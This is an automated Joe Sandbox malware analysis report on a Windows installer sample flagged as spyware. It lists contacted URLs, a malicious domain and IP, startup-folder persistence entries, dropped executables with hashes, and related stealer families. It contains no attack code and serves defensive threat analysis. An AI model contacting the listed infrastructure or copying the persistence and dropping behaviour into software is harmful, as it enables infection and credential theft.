http://home.netscape.com/NC-rdf#PageTitle	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
https://amenstilo.website/F	Qjsync.exe, 0000000C.00000002.2990103682.0000000000449000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Subscribablehttp://home.netscape.com/NC-rdf#Subscribedhttp://home.ne	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://appsyndication.org/2006/appsyn	UolJwovI8c.exe	false		high
https://amenstilo.website/	Qjsync.exe, 0000000C.00000002.2990103682.000000000047C000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2800043144.00000000004E2000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990103682.0000000000449000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#CanFileMessages	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteCodeSigningCA.crl02	thunderbird.exe, 00000003.00000003.2260894204.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2261061954.00000000030F2000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2260778595.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2260293637.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2261175868.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2261421950.00000000030F3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://home.netscape.com/NC-rdf#CanRename	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#GetNewMessages	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#fileExtensions	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#CanSearchMessages	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#LeafName	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#PageTitleMain	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#PageTitleAddressing	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#DownloadState	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#CanCreateFoldersOnServer	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Identity	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Name?sort=true	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#FolderSize	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#prettyNamehttp://home.netscape.com/NC-rdf#alwaysAskhttp://home.netsc	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#DownloadFlaggedMessages	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Enabled	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.74.149	amenstilo.website	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1566414
Start date and time:	2024-12-02 07:23:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	UolJwovI8c.exe renamed because original name is a hash value
Original Sample Name:	b0ad260d058a7f4f299b4bbc7f876799.exe
Detection:	MAL
Classification:	mal100.spyw.expl.evad.winEXE@22/41@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 99% Number of executed functions: 119 Number of non-executed functions: 265
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target thunderbird.exe, PID 4932 because there are no executed function
Execution Graph export aborted for target thunderbird.exe, PID 7040 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:24:05	API Interceptor	1x Sleep call for process: UolJwovI8c.exe modified
01:24:45	API Interceptor	2x Sleep call for process: cmd.exe modified
01:24:57	API Interceptor	13x Sleep call for process: Qjsync.exe modified
07:24:42	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITDBEF.tmp
07:24:55	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Kcvalid.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.74.149	54XwlwAlcM.js	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bg.microsoft.map.fastly.net	file.exe	Get hash	malicious	LummaC Stealer	Browse	199.232.210.172
	file.exe	Get hash	malicious	Credential Flusher	Browse	199.232.210.172
	9jCa1zq5XE.exe	Get hash	malicious	AsyncRAT	Browse	199.232.214.172
	invoice-6483728493.pdf .js	Get hash	malicious	RHADAMANTHYS	Browse	199.232.214.172
	invoice-6483728493.pdf	Get hash	malicious	Unknown	Browse	199.232.210.172
	file.exe	Get hash	malicious	Credential Flusher	Browse	199.232.210.172
	file.exe	Get hash	malicious	RedLine	Browse	199.232.214.172
	nhbjsekfkjtyhja.exe	Get hash	malicious	RHADAMANTHYS	Browse	199.232.214.172
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	199.232.214.172
	F24_023.pdf (2).js	Get hash	malicious	Unknown	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	PO#BBGR2411PO69.xls	Get hash	malicious	FormBook, HTMLPhisher	Browse	188.114.97.6
	http://demo.specialistbanking.co.uk/ad.PDF	Get hash	malicious	Unknown	Browse	104.16.123.96
	ZAMOWIEN.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse	172.67.145.234
	file.exe	Get hash	malicious	Amadey, Discord Token Stealer, LummaC Stealer, Nymaim, Stealc, Vidar	Browse	172.67.165.166
	sora.mips.elf	Get hash	malicious	Mirai	Browse	1.4.51.14
	sora.ppc.elf	Get hash	malicious	Mirai	Browse	172.68.102.131
	file.exe	Get hash	malicious	LummaC	Browse	104.21.82.174
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	https://wixauth-processing.es/wp/vite-react-web.vercel.app.html	Get hash	malicious	Unknown	Browse	104.21.26.223
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	Amadey, Discord Token Stealer, LummaC Stealer, Nymaim, Stealc, Vidar	Browse	104.21.74.149
	file.exe	Get hash	malicious	LummaC	Browse	104.21.74.149
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.74.149
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.74.149
	tyhkamwdmrg.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.74.149
	tyhkamwdmrg.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.74.149
	jgurtgjasdth.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.74.149
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.74.149
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.74.149
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.74.149

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\Qjsync.exe	ONHQNHFT.msi	Get hash	malicious	Unknown	Browse
	es.hta	Get hash	malicious	Unknown	Browse
	BkTwXj17DH.exe	Get hash	malicious	Unknown	Browse
	TVr2Z822J3.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	9nobq4rqr0.exe	Get hash	malicious	Unknown	Browse
	KClGcCpDAP.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\18a45226

Download File

Process:	C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe
File Type:	data
Category:	dropped
Size (bytes):	5772470
Entropy (8bit):	7.738934471969194
Encrypted:	false
SSDEEP:	98304:zkuahgBa324OoPY6ox1fykT6rbBoJfS6ndl0sOQq6mR+nT0ZNXe77:LegBzbx1fyJ4fSwl0sHVBT2uv
MD5:	E535D38454CD77953D65A7BE0733A85A
SHA1:	358A0A62BA8EA230A73C8CA9EA32B8D45050B423
SHA-256:	5AB13D6CE4203CF684BAFC786860351F6596E93FD7C8F159B9F5DF72F298B65C
SHA-512:	5BDB3580980DB20FB1952A00021324AACF878E3D94E499908A32C53428F076B88B98E9C074B377AEDBB2190FA23CFD089AE35A4802C5648DD1F139892855ABF1
Malicious:	false
Preview:	i&..k&..j&..j&..k&..N&..~"..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..OgY..g].OzD..Tf..@}.=Og..Qz.9Rh...D..SU..In..Kz.9Rh..Sy.j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..)I@..R`..Os./^..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..)IJ..G}.#Hz..Hj.j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..Oq@..o[.6k`..Iz..R'./rU..Gd..I{.j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&....'.D.9.X...j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..

C:\Users\user\AppData\Local\Temp\Amatol_20241202012405.log

Download File

Process:	C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	985
Entropy (8bit):	5.381408364174183
Encrypted:	false
SSDEEP:	24:0+6bAIeLLzcyp5yJu+2smQ1u+1gcP2Ns9u+1gcP2Jmu+1gcP2Ra9R3xu+1gcP2ws:FMxYj5yFtt13rB13D13b9R3913W13nn
MD5:	8E3DB4E946DDA0D5779E97CF1D14C275
SHA1:	BFC03B39E607BBA3BBED70D1F5C535CC633762EC
SHA-256:	88871537362E8F5B1240AA77EAB4034CBC04FCF764501EF73E229D82B7E60195
SHA-512:	F5609B3063B20951F169FDE7E881BC4FB5F5AF3B658B844B52089850B404E05C8E143D497A7CDA24CC2FBC88767C0150FE25D0948285380C5C771389314E5BB1
Malicious:	false
Preview:	[130C:1BAC][2024-12-02T01:24:05]i001: Burn v3.11.1.2318, Windows v10.0 (Build 19045: Service Pack 0), path: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe..[130C:1BAC][2024-12-02T01:24:05]i009: Command Line: '-burn.clean.room=C:\Users\user\Desktop\UolJwovI8c.exe -burn.filehandle.attached=684 -burn.filehandle.self=512'..[130C:1BAC][2024-12-02T01:24:05]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\Desktop\UolJwovI8c.exe'..[130C:1BAC][2024-12-02T01:24:05]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\Desktop\'..[130C:1BAC][2024-12-02T01:24:05]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\Amatol_20241202012405.log'..[130C:1BAC][2024-12-02T01:24:05]i000: Setting string variable 'WixBundleName' to value 'Amatol'..[130C:1BAC][2024-12-02T01:24:05]i000: Setting string variable 'WixBundleManufacturer' to value 'Fluoroscopy'..

C:\Users\user\AppData\Local\Temp\Qjsync.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2364728
Entropy (8bit):	6.606009669324617
Encrypted:	false
SSDEEP:	49152:lbCT2kOGRpfJMi3kLRQrjYgeeZyTDwMHfDYZNBi:TkOKMiY0BZMHfDYZNBi
MD5:	967F4470627F823F4D7981E511C9824F
SHA1:	416501B096DF80DDC49F4144C3832CF2CADB9CB2
SHA-256:	B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
SHA-512:	8883EAD428C9D4B415046DE9F8398AA1F65AE81FE7945A840C822620E18F6F9930CCE2E10ACFF3B5DA8B9C817ADE3DABC1DE576CBD255087267F77341900A41C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: ONHQNHFT.msi, Detection: malicious, Browse Filename: es.hta, Detection: malicious, Browse Filename: BkTwXj17DH.exe, Detection: malicious, Browse Filename: TVr2Z822J3.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 9nobq4rqr0.exe, Detection: malicious, Browse Filename: KClGcCpDAP.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:<..To..To..To.:.o..To...o..To.:9o..To.:.o..To.:/o..To..Uoe.To...o\|.To...o..To...o..To...o..ToRich..To................PE..d...^.?e..........#......H.....................@..............................%.....h.$.....................................................XW..,........q...p..$h....#.8)......................................(....................`...............................text...RG.......H.................. ..`.rdata..R/...`...0...L..............@..@.data................\|..............@....pdata..$h...p...j..................@..@Shared...............p..............@....tls.................x..............@....rsrc....q.......r...z..............@..@................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\b9304be

Download File

Process:	C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe
File Type:	data
Category:	dropped
Size (bytes):	5772470
Entropy (8bit):	7.738934280349743
Encrypted:	false
SSDEEP:	98304:rkuahgBa324OoPY6ox1fykT6rbBoJfS6ndl0sOQq6mR+nT0ZNXe77:DegBzbx1fyJ4fSwl0sHVBT2uv
MD5:	3558ED928E39F1464F65F958425A2797
SHA1:	DAF0CC84353339FC4380ED8B048FE34467910887
SHA-256:	40629E5AB9E1ADA89FA42364A99AC9B75CB10249DFE5D876C7ADFD98F6BE2450
SHA-512:	924359A19DD687A068304F5DA88D2A587E3AC05806BBDABD73728CAD315E1574FD1BA3B2B9487DA6393B600793F533616DA59E68E9B0B97C6BE86C8E59BA663A
Malicious:	false
Preview:	i&..k&..j&..j&..k&..N&..~"..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..OgY..g].OzD..Tf..@}.=Og..Qz.9Rh...D..SU..In..Kz.9Rh..Sy.j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..)I@..R`..Os./^..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..)IJ..G}.#Hz..Hj.j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..Oq@..o[.6k`..Iz..R'./rU..Gd..I{.j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&....'.D.9.X...j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..

C:\Users\user\AppData\Local\Temp\dicxrxnwre

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Dec 2 05:24:16 2024, mtime=Mon Dec 2 05:24:16 2024, atime=Thu Nov 28 12:29:44 2024, length=8504936, window=hide
Category:	dropped
Size (bytes):	904
Entropy (8bit):	4.99912982303959
Encrypted:	false
SSDEEP:	12:88dC4+ypnu8Ch98lXIsY//YfSELSXS5kqM/oOvWhlyoAjA5ls+Hc1g4cJajXhmQc:8c+SDu8lXUnm35vM/hRLA7sQUjXhpm
MD5:	F50E1DA85C3FC6448C7FAA9E4DEF4525
SHA1:	09BBD203FFF82CA58BF43C2113D0335226DB38BE
SHA-256:	60DD7C61395F434A7F36BD003CCC42DDFFF7074697968C4596B32839E3F06F3B
SHA-512:	AFFC121D0A40ECA15EB0D7BC9C68B2CCAD6325E5A3924E663B374B645EC25A7D2C1E4E07B8CF41D7318F4F1CBD67A0A58EFA82B0CD32ECEC17EBE327FEA15E6F
Malicious:	false
Preview:	L..................F.... .......D....U.D.......A..h........................:..DG..Yr?.D..U..k0.&...&.......$..S...4...D..(.1.D......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.3...........................^.A.p.p.D.a.t.a...B.V.1......Y.3..Roaming.@......EW<2.Y.3..../.....................R...R.o.a.m.i.n.g.....Z.1......Y.3..GZManage..B......Y.3.Y.3..............................G.Z.M.a.n.a.g.e.....l.2.h..\|Y.k .THUNDE~1.EXE..P......Y.3.Y.3..............................t.h.u.n.d.e.r.b.i.r.d...e.x.e.......i...............-.......h...........!.o......C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe..&.....\.....\.R.o.a.m.i.n.g.\.G.Z.M.a.n.a.g.e.\.t.h.u.n.d.e.r.b.i.r.d...e.x.e.`.......X.......878411...........hT..CrF.f4... ..)..Jc...-...-$..hT..CrF.f4... ..)..Jc...-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Local\Temp\eec6af15

Download File

Process:	C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe
File Type:	data
Category:	dropped
Size (bytes):	5772470
Entropy (8bit):	7.738934534782632
Encrypted:	false
SSDEEP:	98304:bkuahgBa324OoPY6ox1fykT6rbBoJfS6ndl0sOQq6mR+nT0ZNXe77:TegBzbx1fyJ4fSwl0sHVBT2uv
MD5:	FD8E9ECEBE20C1E438A0B69A85B0D33C
SHA1:	6EFFB5221931B4A00F0AE0177F96B3EDF9D432E0
SHA-256:	3DEBAB7F95264C09173D25660F9352330F53B7555476C876257D3F1D1361C687
SHA-512:	CF84C976836C4FD35DEB5DE11C58DAFEAE832DFF6A6281344F37AEAC6D46445F7FB2E3762C2437346B2B970D832D4DDFAFAFECFCF92786D1937423AAE1CAE599
Malicious:	false
Preview:	i&..k&..j&..j&..k&..N&..~"..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..OgY..g].OzD..Tf..@}.=Og..Qz.9Rh...D..SU..In..Kz.9Rh..Sy.j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..)I@..R`..Os./^..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..)IJ..G}.#Hz..Hj.j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..Oq@..o[.6k`..Iz..R'./rU..Gd..I{.j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&....'.D.9.X...j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..

C:\Users\user\AppData\Local\Temp\ekxwihvmv

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2675200
Entropy (8bit):	6.745223583528521
Encrypted:	false
SSDEEP:	49152:YTDTVe6BhhQQrTyEjMhn/w2EdU0Oz+E2TQVXmqtRSfoMBBMItgxmQjvVsYcjc9t/:YzVx6RKXURWpyTVnsG
MD5:	74F8644C5185C908D81B778B03068120
SHA1:	B0FAAC424A2E1881BD8E1D26E8F4B069CF689763
SHA-256:	72812A162F9450320A80589A4D432BFAB8C168D199D60783E7792705BD3981D7
SHA-512:	3058310B4A4510C0B85C51839EB1AEC734F5A9C61EA648CCFD5BBDDF72CBF90439AD4B4F889EC503E38087D1E33DA4C8CE99CE03D07727902A563BAB8EAF86D6
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
